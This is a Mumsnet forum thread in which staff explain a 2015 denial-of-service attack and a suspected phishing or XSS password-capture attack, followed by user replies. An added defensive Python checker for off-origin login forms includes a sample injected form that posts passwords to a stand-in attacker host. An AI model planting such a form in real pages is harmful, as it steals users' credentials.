More about the Technical side of the attacks on Mumsnet

720 replies

JustineMumsnet · 19/08/2015 11:17

Hi all,
There have been, understandably, a lot of questions about the tech side of the attack on Mumsnet, so here, courtesy of the tech team, is some more detail. We obviously do have to be a bit careful with the details because we don't want to give away information that could help other hackers. Whilst it's true that "security through obscurity" isn't real security, we have no wish to make it easier for a future attacker.

We've spent a lot of time since the attacks began proactively defending against them, minimising their impact and protecting against future attacks. With a busy site like Mumsnet there is a lot of information to go through. When we uncover a new snippet of information, perhaps a new suspicious user account, we have to go back to the start and reanalyze, so it can be slow going at times. We are working with our technology partners, who have a lot of experience of these kinds of attacks, and we have used lots of resources available to us.

Some aspects of our technology stack have already been extensively tested by external specialists. Some of our software code is quite old - nearly as old as Mumsnet itself - and things have moved on a lot over that time. However, we have a program of code review whereby all new code is checked by someone other than the person who created it. It's not perfect and everyone makes mistakes, but we take the quality of our code very seriously.

The Denial Of Service (DOS) attack against Mumsnet was a heavy, sustained attack which initially overwhelmed our ability to respond to legitimate requests. Mumsnet might typically get something like 50-100 requests per second. During the attack we were getting around 17,000 requests per second. Each request carried more data than is normal as well.

The hacking attack on our website was separate from the DOS, though we believe perpetrated by the same person or people. We follow many of the industry's best practices, such as using HTTPS for our login pages, keeping our database separate from our cluster of web servers and not accessible from the internet, and so on. We don't necessarily use the same standards of security as say your online banking service might use, for example requiring multiple passwords or using two factor authentication. We try to balance security against usability and the sensitivity of the information we hold. After all, as pointed out by one of you in an earlier thread, the majority of information we have about a user is what that user publishes in Talk, which is there for all to see.

As has been mentioned several times, we keep our passwords encrypted and we use the recommended algorithms for this, with high "strength" settings. This means that if someone somehow obtained the password data from our database they wouldn't be able to make any use of them - they wouldn't work on our site or on any other site even if the user used the same password on that other site. This remains the case even for MNHQ staff; they cannot un-encrypt the passwords either.

We are now pretty confident it was a phishing attack. Phishing, where a hacker gets a user to enter their username and password into a form from which they can capture that information, fits all the data we have. The hacker doesn't need to decrypt anything, because they capture the password in the browser as it is entered (either by typing it, or if it was automatically remembered by the user's browser or password manager). The list of passwords that has been published includes some that users have identified as being ones that they've mistyped. Our database wouldn't have mistyped ones, only accurate ones, whereas those collected by recording what a user submits would, and do, contain errors.

It's not obvious how it has been conducted though. We have been able to create a proof of concept which shows that it could work, but that relies on some steps that would be difficult or virtually impossible for a hacker. Phishing attacks sometimes use social engineering to "trick" people into using the fake website rather than the real one, but again, for various reasons, we can rule some of these out. Other phishing attacks are more technical and use other means to get people to visit the fake page. One such example is Cross Site Scripting (XSS). XSS is ranked number three on the Open Web Application Security Project's top ten list of web site security problems. If the hacker can get the website to put his own code on pages which are to be viewed by other users, s/he can modify the page to redirect the login process to their own site: a page which looks just like our login page but is actually recording the details and sending them to the hacker. Also possible, but even less likely, is modifying our login page to submit the details to the hacker as well as to us. If the hacker had gained access to our Content Management System he could have done the former, though not the latter. However, we record all changes that are made and there are no suspicious ones.

It's impossible for us to know how many users' passwords have been collected. It's a reasonable assumption, and our working one, that the passwords of everybody that has logged in since 6th August 2015, and possibly some time before that, have been collected.

In light of the attacks, we've bolstered some aspects of our security, particularly around our administrative functions. We have further changes planned and will be working on these in the coming days.

Forcing everyone to reset their password, as we have done, would render the list useless provided that users don't choose the same new password and they've not used the same username and password elsewhere.

Some users have questioned why certain other changes aren't being made already, such as a move to enforcing stricter passwords, which makes sense. However, given how crucial the part of our system that deals with passwords is, we have to be really cautious when making changes to it. We don't want to rush and end up creating bigger holes, but we will certainly take steps to encourage users to strengthen passwords as soon as practicable.

Any questions, do post here. We'll answer as transparently as we can, bearing in mind the caveat about helping future hackers mentioned earlier.
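The post above describes the XSS variant in which injected script rewrites the login form so credentials are submitted to the attacker's page as well as, or instead of, the real one. As an added illustration (not Mumsnet's code), the check below parses a rendered login page and flags any form containing a password field whose action resolves to an origin other than the site's own; the origin and the sample HTML are constructed, and the complementary server-side mitigation is the Content-Security-Policy directive `form-action 'self'`, which makes browsers refuse such off-origin submissions.

```python
"""Added example: detect a password form whose action posts off-origin.
Site origin and HTML samples are constructed, not taken from Mumsnet."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

SITE_ORIGIN = "https://www.example.org"  # assumed origin for the samples


class FormActionCollector(HTMLParser):
    """Record (action, contains_password_field) for every <form> seen."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None  # [action, has_password] while inside a <form>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = [a.get("action") or "", False]
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current[1] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(tuple(self._current))
            self._current = None


def offsite_password_forms(html, page_url):
    """Return resolved actions of password forms that post to a foreign origin.
    Relative actions resolve against page_url; an empty action posts back to
    the page itself. A scheme change (https -> http) also counts as foreign."""
    parser = FormActionCollector()
    parser.feed(html)
    parser.close()
    site = urlsplit(page_url)
    flagged = []
    for action, has_password in parser.forms:
        if not has_password:
            continue
        target = urlsplit(urljoin(page_url, action))
        if (target.scheme, target.netloc) != (site.scheme, site.netloc):
            flagged.append(target.geturl())
    return flagged


# Constructed samples: the genuine form, then the same page after an injected
# script has added a second form posting to an attacker-controlled host.
GOOD_PAGE = '<form action="/session" method="post"><input type="password" name="pw"></form>'
BAD_PAGE = GOOD_PAGE + '<form action="https://collector.invalid/l" method="post"><input type="password" name="pw"></form>'

if __name__ == "__main__":
    print(offsite_password_forms(BAD_PAGE, SITE_ORIGIN + "/login"))
```

Run periodically against the live login page from outside the network, this catches both a rewritten action and an added shadow form, which is the kind of change the post says was not found in its CMS audit logs.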

Simurgh · 22/08/2015 19:12

I'm not bad at all - but maybe there's some DOS activity going on. Who can say?

BoreOfWhabylon · 22/08/2015 19:34

iPad itsnotjust ?

Mine's been driving me mad doing that. Much improved since I cleared cookies earlier.

itsnotjustyou · 22/08/2015 19:48

Bore, no Macbook. I've cleared cookies but the arrow thingy flashes every time I type now.

Simurgh · 22/08/2015 19:58

Thinking about it, the text lagging the typing is something I've had a lot over the last few months so I may not have actually noticed it happening today. (I was trying to work out whether that was a download or upload issue and my brain told me 'Go Away' so I leave it to you all.)

Garrick · 22/08/2015 20:20

I have a 'form saver' (selective keylogger) on my laptop - it saves my posts so I don't lose them if Mumsnet or a website flips out before successfully uploading - and it causes a lag if its database is too full or it's gone to sleep.

There are lots of possible reasons for lag: virus scanner running; automatic updates downloading; low battery in a wireless keyboard; other general stuff. But if you've recently noticed a consistent change for the worse, it could be worth using a few different malware scanners just in case.

notinkansasanymoretoto · 23/08/2015 01:46

Hmmmm. So I had to set up a completely new account with a new email address to get back on. My original listed account did not ever get forcibly locked out, despite me logging in and out many times on different devices to try and trigger a forced reset. Nada. So in the end I requested a password reset, received the email, clicked the link, was taken to an 'expired link' page. About eight times last night, as I kept trying to reset the password. Also tried different devices. Same. And another couple of times today, as obviously I had now successfully logged myself out by the password reset, but couldn't actually get a usable link to actually reset my password - all of them led to 'expired link'... Hence the completely new shiny account with new shiny email account.

Of course, I instantly forgot my password for the new account. So I gritted my teeth and requested a reset. Link worked first time.

So, is my 'listed' account utterly buggered then? Is this fishy? I am mildly curious that my compromised account didn't get a forced reset, and nor would it accept a password reset. And yet the new shiny one seems to be working like a dream on the same device... Without all the glitchy page reloading shite as well.

Hmm. Paranoia city, here, I tells ya.

notinkansasanymoretoto · 23/08/2015 01:50

And quelle horreur. Not only am I lilac but now I have to rummage in customize to sort everything out... I may be some time.

00100001 · 23/08/2015 09:35

Can tech answer my question about the fact that the forums seem to point to MN being alerted about this problem in the middle of July?

And also how come after previous hacks passwords for admins were allowed to be so shockingly simple (eg. Rebecca's)?

Why weren't lessons apparently learned?

Simurgh · 23/08/2015 09:52

I should imagine that lessons have been learned now, 001, although there's probably a touch of TSSDNCOP around. (Other companies are probably scurrying like disturbed ants as well - not only from MN but also from the tale of Ashley Madison.)

00100001 · 23/08/2015 10:05

You'd hope so!

tigerscameatnight · 23/08/2015 10:05

I actually think 001 there should be a serious meeting about passwords. I know any site can get hacked but to have such awful passwords in place shows a complete disregard for the security of details of users.

Simurgh · 23/08/2015 10:43

The points are well made - I just don't think you're going to get answers to them any time soon.

My own 'hope' is that the lessons - other than the immediate ones - aren't subsumed in some sort of 'We ought to.......' big review that takes two years to complete and ends up sitting on the CEO's desk for six months before being quietly filed.

MN is an internet business and needs to be able to react quickly, decisively and - most importantly - with a fair degree of breadth to any developments which potentially impact it. Anything else would, in my view, be sticking plaster and I would hope they didn't go only for such solutions, attractive though they might be to tired people.

00100001 · 23/08/2015 10:52

I'm sure there has been and will be lots of serious meetings.

To be fair though, the hacker guy (unless he actually comes up with something "good") doesn't actually appear to have much information.

It's not like he actually got into Databases and extracted any ACTUAL information from their internal servers. Otherwise he'd be publishing MN users email addresses etc.

Simurgh · 23/08/2015 10:57

I agree - but I'm still not comfortable with the weaknesses (both organisational and technical) that this whole thing has exposed. That situation needs to be dealt with quickly.

(I'm going to bite my tongue on the topic for now though. I'm being reminded forcibly that I don't have a dog in this fight.)

00100001 · 23/08/2015 11:06

They have been dealt with though (this time). My complaint was this isn't the first time it's happened!

OutToGetYou · 23/08/2015 11:44

I'm not sure how different passwords would have helped, they weren't guessed in a social engineering manner.

Funnily enough, in changing my password for a number of sites several required me to have far stricter parameters than they had when I joined up, though none had told me by email at any point that they had changed their rules and I should change my password.

Dp has been hacked this week - both his bank account and credit card have been used fraudulently [real pain for him as he flew to the US today and has no access to his bank account or any credit card]. There is only one website he has ever used both on, but there has been nothing in the press about that [very large well known website] being hacked. So, I am working on the assumption he has been hacked somehow. He uses a work laptop so he's going to get that checked. He doesn't use MN.

00100001 · 23/08/2015 11:49

No, secure passwords wouldn't have stopped phishing. But having such easy to guess passwords is ridiculous (seriously, there was an admin password that was the same as the username!) And this is after they've already been hacked before.

It's boggling

Simurgh · 23/08/2015 12:34

Websites are being broken into and internet users are being hacked all of the time. Mumsnet have, unlike others, been fairly open about most of the issues. (Total openness to the public on technical security matters would have been daft.) The problem is not them alone - 'they' are indeed Out To Get You.

AlfieandAnnieRose · 23/08/2015 12:58

MNHQ when I logged in yesterday on my iPad my password appeared in the search box? I immediately logged out then logged back in checking the http was on the address bar and it did it again! Might be a fluke but it worried me.

OutToGetYou · 23/08/2015 14:22

It's funny cos dp works in Internet security/firewalls and stuff, and he's not talking to me so he couldn't ask me for help with sorting it or a way to get some money while in the US.
I only knew cos I heard him telling dss.

Simurgh · 23/08/2015 14:49

Hurt pride - and I'm not belittling that, it's a very strong emotion.

It nearly all boils down to two things - money and/or 'other' with 'other' being some mix of power, glory, revenge, kudos - whichever one takes you in thrall. You see it all through life, it's just that right now, it happens to be with IT.

notinkansasanymoretoto · 23/08/2015 15:31

Alfie just go into settings on your iPad - you will have checked something to remember passwords for mn. I'm sure someone else will tell you exactly; I think it's in settings under safari, then in the general box under passwords and auto fill. Not sinister. Just your iPad being 'helpful' until you tell it not to.

AlfieandAnnieRose · 23/08/2015 15:37

Thanks notinkansas I do have my password to autofill but I meant it showed up in the mumsnet search box at the top, as if I had typed it there. Never happened before so I thought I should mention it.

notinkansasanymoretoto · 23/08/2015 16:48

Ah right. Weird! I've been having all sorts of very strange things happen, and it is unnerving to not be able to sort the explainable from the weird but not worrying, to the definitely concerning but still plausibly just tech stuff as they are repairing the site...

2boysnamedR · 23/08/2015 17:19

I was reading up on the AM hack last night and it's a bit eye rolling. If one person can get into the pentagon then assume the internet isn't fool proof. At the end of the day humans invented IT, humans do the coding and systems are only as good as the coder. Even the best coders make mistakes.